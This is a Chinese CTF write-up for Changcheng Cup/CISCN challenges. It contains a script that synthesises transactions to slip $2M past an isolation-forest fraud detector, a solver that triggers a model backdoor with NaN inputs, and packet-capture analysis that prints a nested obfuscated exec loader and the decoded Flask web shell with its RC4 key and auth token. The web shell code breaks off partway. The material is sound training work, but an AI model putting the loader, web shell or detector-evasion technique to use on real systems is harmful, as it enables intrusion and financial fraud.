第三届“长城杯”&ciscn初赛Misc wp AI安全 The Silent Heist 题目要求:
[--- 安全银行网关 v4.0 ---]
任务:转账金额 > 2,000,000.00 美元
安全级别:隔离森林(严格模式)
约束条件:
1. 任何交易均不得被判定为异常(-1)。
2. 禁止重放攻击(公共数据已被列入黑名单)。
3. 禁止重复交易。
-------------------------------------
正在等待 CSV 数据流(以“EOF”结尾)...
数据正常的读取,跳过表头那一行
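def read_data(path='public_ledger.csv'):
    """Load the public ledger into a float matrix, skipping the header row.

    Only rows with exactly 20 comma-separated fields are kept; any other row
    is dropped, as in the original snippet.

    Args:
        path: CSV file to read. Defaults to the ledger the challenge hands out,
            so existing callers need no change.

    Returns:
        ``np.ndarray`` of shape (rows, 20); an empty array when no row matched.

    Raises:
        ValueError: a kept row contains a non-numeric field.
    """
    data = []
    with open(path, 'r') as f:
        lines = f.readlines()
    for line in lines[1:]:
        values = line.strip().split(',')
        if len(values) == 20:
            data.append([float(v) for v in values])
    return np.array(data)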
进行核密度估计
# Fit one Gaussian KDE per ledger column, so each column of the synthetic
# stream can later be sampled from the ledger's marginal distribution.
kdes = []
for i in range(20):
    kde = KernelDensity(bandwidth='silverman', kernel='gaussian')
    kde.fit(data[:, i:i+1])   # i:i+1 keeps the column 2-D, the shape the estimator expects
    kdes.append(kde)
feat_0的特殊处理
# Push the sampled feat_0 column towards a 2.1M total (the task needs > 2M)
# without stretching it uniformly: each sample's multiplier grows with its
# rank, from 1.0 for the smallest up to ~scale_factor for the largest, so the
# column keeps its ordering and roughly its shape.
current_total = np.sum(feat0_samples)
target_total = 2100000
scale_factor = target_total / current_total
for rank, idx in enumerate(sorted_indices):
    percentile = rank / n_samples          # rank 0 = smallest sample
    individual_scale = 1 + (scale_factor - 1) * percentile
    scaled_feat0[idx] = feat0_samples[idx] * individual_scale
并且还要保持特征的相关性,以及避免微小的扰动造成重复,最后生成数据的exp为:
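import numpy as np
from sklearn.neighbors import KernelDensity
import sys

# "The Silent Heist": emit a 10 000-row synthetic transaction stream whose
# feat_0 (the amount) sums past the 2,000,000 target while every row still
# resembles the public ledger. Rows are sampled per feature from a KDE of the
# ledger (so nothing replays a blacklisted public row) and get a little noise
# (so no two rows are identical), then are clipped to the ledger's range.


def read_data(path='public_ledger.csv'):
    """Load the public ledger (header skipped) as a float matrix.

    Rows without exactly 20 fields, or with a non-numeric field, are dropped;
    the public rows only serve to learn each feature's distribution.

    Args:
        path: ledger CSV; defaults to the file the challenge provides.

    Returns:
        ``np.ndarray`` of shape (rows, 20).
    """
    data = []
    with open(path, 'r') as f:
        lines = f.readlines()
    for line in lines[1:]:
        values = line.strip().split(',')
        if len(values) != 20:
            continue
        try:
            data.append([float(v) for v in values])
        except ValueError:   # only float() can fail here; was a bare except
            continue
    return np.array(data)


data = read_data()
n_samples = 10000

# One Gaussian KDE per column: the synthetic stream is drawn from the ledger's
# marginal distributions. i:i+1 keeps the column 2-D for the estimator.
kdes = []
for i in range(20):
    kde = KernelDensity(bandwidth='silverman', kernel='gaussian')
    kde.fit(data[:, i:i+1])
    kdes.append(kde)

new_data = np.zeros((n_samples, 20))
# Fixed seed: KernelDensity.sample() and np.random.normal() below draw from
# numpy's global RNG, so the output is reproducible run to run.
np.random.seed(42)

# feat_0: sample, then push the column total to 2.1M. Instead of one flat
# multiplier, each sample is scaled by a factor growing with its rank (1.0 for
# the smallest, ~scale_factor for the largest) so the column keeps its ordering
# and roughly its shape.
feat0_samples = kdes[0].sample(n_samples).flatten()
current_total = np.sum(feat0_samples)
target_total = 2100000
scale_factor = target_total / current_total
sorted_indices = np.argsort(feat0_samples)
ranks = np.empty(n_samples, dtype=float)
ranks[sorted_indices] = np.arange(n_samples)   # rank 0 = smallest sample
individual_scale = 1 + (scale_factor - 1) * (ranks / n_samples)
scaled_feat0 = feat0_samples * individual_scale
new_data[:, 0] = scaled_feat0

# Other features: where the ledger shows |corr| > 0.1 with feat_0, add a
# feat_0-driven component so the synthetic rows keep that correlation;
# otherwise sample the column independently. feat_0 is fixed at this point,
# so its z-score is computed once (guarded against a degenerate zero spread).
feat0_std = np.std(new_data[:, 0])
feat0_normalized = ((new_data[:, 0] - np.mean(new_data[:, 0])) / feat0_std
                    if feat0_std else np.zeros(n_samples))
for i in range(1, 20):
    correlation = np.corrcoef(data[:, 0], data[:, i])[0, 1]
    if abs(correlation) > 0.1:
        base_samples = kdes[i].sample(n_samples).flatten()
        correlated_part = correlation * feat0_normalized * np.std(base_samples)
        new_data[:, i] = base_samples + correlated_part
    else:
        new_data[:, i] = kdes[i].sample(n_samples).flatten()

# Per-feature jitter of 0.5 % of the column's spread so no two rows coincide;
# the gateway rejects duplicate transactions.
noise_level = 0.005
for i in range(20):
    noise = np.random.normal(0, np.std(new_data[:, i]) * noise_level, n_samples)
    new_data[:, i] += noise

# Clip each column to a band derived from the ledger: 20 % beyond the observed
# min/max, or 3 sigma around the mean, whichever is tighter. (For a negative
# minimum, 0.8 * min actually lies inside the observed range.)
for i in range(20):
    feat_min = np.min(data[:, i])
    feat_max = np.max(data[:, i])
    feat_mean = np.mean(data[:, i])
    feat_std = np.std(data[:, i])
    lower_bound = max(feat_min * 0.8, feat_mean - 3 * feat_std)
    upper_bound = min(feat_max * 1.2, feat_mean + 3 * feat_std)
    new_data[:, i] = np.clip(new_data[:, i], lower_bound, upper_bound)

# Sanity check on stderr (stdout must carry only the CSV stream): clipping can
# pull the total back under the 2M target.
total_amount = np.sum(new_data[:, 0])
print(f"feat_0 total after clipping: {total_amount:.2f}", file=sys.stderr)

# Write the stream in the gateway's format: header, 10 decimals per value,
# and a trailing EOF marker with no newline after it.
with open('flag.txt', 'w') as f:
    header = [f'feat_{i}' for i in range(20)]
    f.write(','.join(header) + '\n')
    for row in new_data:
        f.write(','.join(f"{x:.10f}" for x in row) + '\n')
    f.write('EOF')
with open('flag.txt', 'r') as f:
    sys.stdout.write(f.read())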
将得到的数据上传得到flag
欺诈猎手的后门陷阱 挑战目标:找到模型的后门触发条件,上传满足条件的特征数据,获取Flag
这题关于找到解密密钥先放着
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AI Model Backdoor Exploitation Tool

CTF solver for the "欺诈猎手的后门陷阱" challenge: posts a feature vector whose
numeric fields are all NaN to the model's /api/predict endpoint and, when the
service reports the backdoor as triggered, decodes the returned flag with
Base64 -> XOR(key) -> Base64.
"""
import json
import base64
import argparse
import logging
import sys
from itertools import cycle
from typing import Optional, Tuple

import requests
import urllib3

# Silence the InsecureRequestWarning that verify=False (below) would emit
urllib3.disable_warnings()

# Logging setup
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - [%(levelname)s] - %(message)s',
    datefmt='%H:%M:%S'
)
logger = logging.getLogger(__name__)


class AISolver:
    """One run against a target: trigger the backdoor, then decrypt the flag.

    Attributes:
        target_url: base URL as given on the command line.
        api_url: prediction endpoint, ``<base>/api/predict``.
        key: XOR key used by decrypt_flag.
        timeout: per-request timeout in seconds.
        session: requests session carrying the JSON content type.
    """

    def __init__(self, target_url: str, key: str, timeout: int = 10):
        self.target_url = target_url
        self.api_url = target_url.rstrip("/") + "/api/predict"
        self.key = key
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({
            "Content-Type": "application/json",
            "User-Agent": "CTF-Solver/2.0"
        })

    def generate_nan_payload(self) -> str:
        """
        Build the payload with every feature set to NaN.

        Note: RFC 8259 JSON has no NaN token, but Python's json.dumps emits a
        bare ``NaN`` unless allow_nan=False. A backend that parses it leniently
        (pandas/numpy style) ends up with np.nan in every field, and a range
        check on NaN is always False -- which is what this challenge's model
        trips over. The server-side fix is to reject non-finite numbers at
        parse time (e.g. a ``parse_constant`` that raises).
        """
        data = {
            "trans_amount_usd": float('nan'),
            "addr_deviation_score": float('nan'),
            "trans_time_risk_score": float('nan'),
            "merchant_code_hash": float('nan'),
            "card_issuer_code": float('nan'),
            "pos_terminal_id": float('nan'),
            "transaction_type_code": float('nan'),
            "cvv_verify_score": float('nan'),
            "account_age_month": float('nan'),
            "daily_trans_count": float('nan')
        }
        # allow_nan is already the default; spelled out because the trick depends on it
        return json.dumps(data, allow_nan=True)

    def trigger_backdoor(self) -> Tuple[Optional[str], Optional[str]]:
        """Trigger the backdoor and fetch the encrypted flag.

        Returns:
            ``(encrypted_flag, hint)`` from the response, or ``(None, None)``
            on a request error, a non-JSON body, or a response that does not
            report ``backdoor_triggered``.
        """
        logger.info(f"正在尝试触发后门: {self.api_url}")
        payload = self.generate_nan_payload()
        try:
            # The payload is sent as a pre-serialised string (data=, not json=)
            # so the NaN tokens reach the wire untouched.
            response = self.session.post(
                self.api_url,
                data=payload,
                timeout=self.timeout,
                # Disables TLS certificate validation; acceptable only because
                # the target is the challenge host.
                verify=False
            )
            response.raise_for_status()
            result = response.json()
            if result.get("backdoor_triggered"):
                logger.info("后门触发成功!")
                return result.get("encrypted_flag"), result.get("hint")
            else:
                logger.warning("请求成功但后门未触发 (可能是Payload被清洗)")
                logger.debug(f"响应内容: {result}")
                return None, None
        except requests.RequestException as e:
            logger.error(f"网络请求失败: {e}")
            return None, None
        except json.JSONDecodeError:
            logger.error("响应不是有效的JSON格式")
            return None, None

    def decrypt_flag(self, encrypted_flag: str) -> Optional[str]:
        """
        Decryption pipeline: Base64 -> XOR -> Base64.

        Args:
            encrypted_flag: the ``encrypted_flag`` value returned by the service.

        Returns:
            The decoded flag text, or ``None`` when any step raises.
        """
        logger.info("开始解密 FLAG...")
        try:
            # 1. Base64 decode
            step1_bytes = base64.b64decode(encrypted_flag)
            # 2. XOR with the key repeated over the data (itertools.cycle)
            key_bytes = self.key.encode('utf-8')
            decrypted_bytes = bytes(
                a ^ b for a, b in zip(step1_bytes, cycle(key_bytes))
            )
            logger.debug(f"XOR解密结果(Hex): {decrypted_bytes.hex()}")
            # 3. Base64 decode again
            # Try the decode first; if it fails, print the XOR result directly
            # in case the challenge skipped that layer.
            try:
                final_flag = base64.b64decode(decrypted_bytes).decode('utf-8')
            except Exception:
                logger.warning("二次Base64解码失败,尝试直接输出XOR结果")
                final_flag = decrypted_bytes.decode('utf-8', errors='ignore')
            return final_flag
        # NOTE(review): this broad catch also hides bugs in the key handling;
        # (binascii.Error, UnicodeDecodeError) is what the steps above raise.
        except Exception as e:
            logger.error(f"解密过程中发生错误: {e}")
            return None

    def run(self):
        """Main flow: trigger, log the hint, decrypt, print the flag."""
        enc_flag, hint = self.trigger_backdoor()
        if hint:
            logger.info(f"题目提示: {hint}")
        if enc_flag:
            flag = self.decrypt_flag(enc_flag)
            if flag:
                print("\n" + "="*60)
                print(f" [SUCCESS] FLAG: {flag}")
                print("="*60 + "\n")
            else:
                logger.error("解密得到空值")
        else:
            logger.error("未能获取加密FLAG,终止任务。")


def main():
    """CLI entry point: --test exercises decrypt_flag offline, else run()."""
    parser = argparse.ArgumentParser(description="CTF AI Backdoor Solver")
    parser.add_argument("-u", "--url", default="https://eci-2zej639k5zq7v01q60o6.cloudeci1.ichunqiu.com:5000/", help="目标基础URL")
    parser.add_argument("-k", "--key", default="ctf_2025_key", help="解密密钥")
    parser.add_argument("--test", action="store_true", help="使用硬编码数据测试解密逻辑")
    args = parser.parse_args()
    if args.test:
        logger.info("进入本地测试模式...")
        solver = AISolver("http://localhost", args.key)
        # Test data (an encrypted flag captured from a real run)
        test_enc = "Khk8LGtnVgIGPCsTOg4NbX8Cd0ERAT8UOR1Wb2h0WQcTPwJJOR4FK390Wl8RLDMQOR4za2hkZF45OCxE"
        res = solver.decrypt_flag(test_enc)
        print(f"测试解密结果: {res}")
    else:
        solver = AISolver(args.url, args.key)
        solver.run()


if __name__ == "__main__":
    main()
得到flag
流量分析 SnakeBackdoor-1 题目内容:
攻击者爆破成功的后台密码是什么?
可以看到此次登录得到一串字符串
1 eyJfZmxhc2hlcyI6W3siIHQiOlsic3VjY2VzcyIsIlx1NzY3Ylx1NWY1NVx1NjIxMFx1NTI5ZiJdfV0sImlzX2FkbWluIjp0cnVlfQ
base64解码得到
1 {"_flashes":[{" t":["success","\u767b\u5f55\u6210\u529f"]}],"is_admin":true}
\u767b\u5f55\u6210\u529f 解码后就是“登录成功”,说明这一次登录是爆破成功的那一次
所以密码是zxcvbnm123
flag{zxcvbnm123}
SnakeBackdoor-2 题目内容:
攻击者通过漏洞利用获取Flask应用的 SECRET_KEY 是什么?
1 tcp contains "SECRET_KEY"
就一个包,直接查看
得到flag{c6242af0-6891-4510-8432-e1cdf051f160}
SnakeBackdoor-3 题目内容:
攻击者植入的木马使用了加密算法来隐藏通讯内容。请分析注入Payload,给出该加密算法使用的密钥字符串(Key)
neta查看能看到上面信息:
1 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
base64解码得到
1 2 _ = lambda __ : __import__ ('zlib' ).decompress(__import__ ('base64' ).b64decode(__[::-1 ])); exec ((_)(b'=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' ))
可以看出数据要先经过反转再进行base64解码再进行zlib解压
反转 -> Base64解码 -> Zlib解压
import base64
import zlib

# Stage-1 blob exactly as it sits inside the injected one-liner (the blob
# body is redacted in this copy of the page).
payload = b'=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'

# The loader does reverse -> base64 decode -> zlib inflate; undo it in the
# same order and print the recovered source.
reversed_blob = payload[::-1]
compressed = base64.b64decode(reversed_blob)
decoded = zlib.decompress(compressed)
print(decoded.decode('utf-8'))
得到
1 exec((_)(b'=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'))
继续解码
1 2 3 4 5 6 7 import zlib import base64 payload = b'=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' decoded_code = zlib.decompress(base64.b64decode(payload[::-1])) print(decoded_code.decode('utf-8'))
得到
1 exec((_)(b'==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'))
解码
import base64
import zlib

# Stage-3 blob taken from the previous stage's exec(...) call (blob body
# redacted in this copy of the page).
payload = b'==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'

# Same unwrapping as every layer so far: reverse, base64 decode, inflate.
reversed_blob = payload[::-1]
compressed = base64.b64decode(reversed_blob)
decoded = zlib.decompress(compressed)
print(decoded.decode('utf-8'))
得到
1 exec((_)(b'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'))
太麻烦了,自动检测解码
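import re
import base64
import zlib
import ast


# Body of a b'...' literal made only of base64 characters: the loader's blobs
# never contain quotes or whitespace. The look-behind stops an identifier that
# ends in "b" (the `'zlib'` inside the loader) from being read as a bytes
# prefix, which is what the old `b[\'"](.*?)[\'"]` did on the full one-liner.
_BLOB_LITERAL = re.compile(r"""(?<![A-Za-z0-9_])b(['"])([A-Za-z0-9+/=]+)\1""")

# More nested layers than this is a decode loop, not a deeper stager.
_MAX_LAYERS = 64


def _find_payload(code_str):
    """Return the longest base64-looking b'...' body in `code_str`, or None."""
    bodies = [m.group(2) for m in _BLOB_LITERAL.finditer(code_str)]
    return max(bodies, key=len) if bodies else None


def _unwrap_once(payload_str):
    """Undo one reversed-base64-zlib layer and return the decoded text.

    The reversed payload (the loader's `__[::-1]`) is tried first, then the
    payload as-is. base64 decoding is strict, so a wrong orientation fails at
    the base64 step instead of silently yielding bytes only zlib can reject
    (with the default validate=False the old fallback never fired).

    Raises:
        ValueError, zlib.error or UnicodeDecodeError from the last attempt.
    """
    last_error = None
    for orientation, candidate in (("reversed", payload_str[::-1]), ("direct", payload_str)):
        try:
            raw = base64.b64decode(candidate, validate=True)
            return zlib.decompress(raw).decode('utf-8')
        except (ValueError, zlib.error, UnicodeDecodeError) as e:   # binascii.Error is a ValueError
            last_error = e
            if orientation == "reversed":
                print("[!] 反转解码失败,尝试直接 Base64 解码...")
    raise last_error


def auto_deobfuscate(code_str, layer=1):
    """Peel reversed-base64-zlib layers off `code_str` until plain code remains.

    Args:
        code_str: source text holding an ``exec((_)(b'...'))`` style loader.
        layer: number of the first layer, used only in the progress messages.

    Returns:
        The innermost decoded source. `code_str` itself when it holds no blob
        literal; ``None`` when the first layer cannot be decoded. When a deeper
        layer fails, the last successfully decoded layer is returned rather
        than throwing away the work already done.
    """
    current = code_str
    decoded_any = False
    while True:
        print(f"[*] 正在尝试第 {layer} 层解码...")
        payload_str = _find_payload(current)
        if payload_str is None:
            print("[-] 未找到符合 b'...' 格式的 payload。")
            return current
        try:
            current = _unwrap_once(payload_str)
        except (ValueError, zlib.error, UnicodeDecodeError) as e:
            print(f"[-] 解码过程中出错: {e}")
            return current if decoded_any else None
        decoded_any = True
        print(f"[+] 第 {layer} 层解码成功!")
        # Another exec(...) around a blob literal means one more stage to peel.
        if not ("exec(" in current and _BLOB_LITERAL.search(current)):
            return current
        if layer >= _MAX_LAYERS:
            print(f"[-] 已达到最大层数 {_MAX_LAYERS},停止递归。")
            return current
        print("[*] 检测到嵌套混淆,继续递归...")
        layer += 1


target_code = r"""
exec((_)(b'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')"""

print("--- 开始自动化去混淆 ---")
final_code = auto_deobfuscate(target_code)
if final_code:
    print("\n[V] 最终结果如下:\n")
    print("-" * 40)
    print(final_code)
    print("-" * 40)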
得到以下代码
# Final stage recovered from the nested loader (SnakeBackdoor-3): a Flask
# web shell that hides behind the application's 404 error handler.
global exc_class
global code
import os,binascii
# `app` (the Flask application) and `request` are presumably provided by the
# namespace the stager exec()s this code in; neither is defined here.
exc_class, code = app._get_exc_class_and_code(404)
# RC4 key shared by request and reply -- the answer to SnakeBackdoor-3.
RC4_SECRET = b'v1p3r_5tr1k3_k3y'
def rc4_crypt(data: bytes, key: bytes) -> bytes:
    # Plain RC4: KSA over a 256-entry state, then PRGA XORed with the data.
    # Symmetric, so the same routine encrypts and decrypts.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    res = bytearray()
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        res.append(char ^ S[(S[i] + S[j]) % 256])
    return bytes(res)
def backdoor_handler():
    # Gate: a fixed X-Token-Auth header; anything else gets a bland "Error".
    if request.headers.get('X-Token-Auth') != '3011aa21232beb7504432bfa90d32779':
        return "Error"
    # The command arrives RC4-encrypted and hex-encoded in the `data` form field.
    enc_hex_cmd = request.form.get('data')
    if not enc_hex_cmd:
        return ""
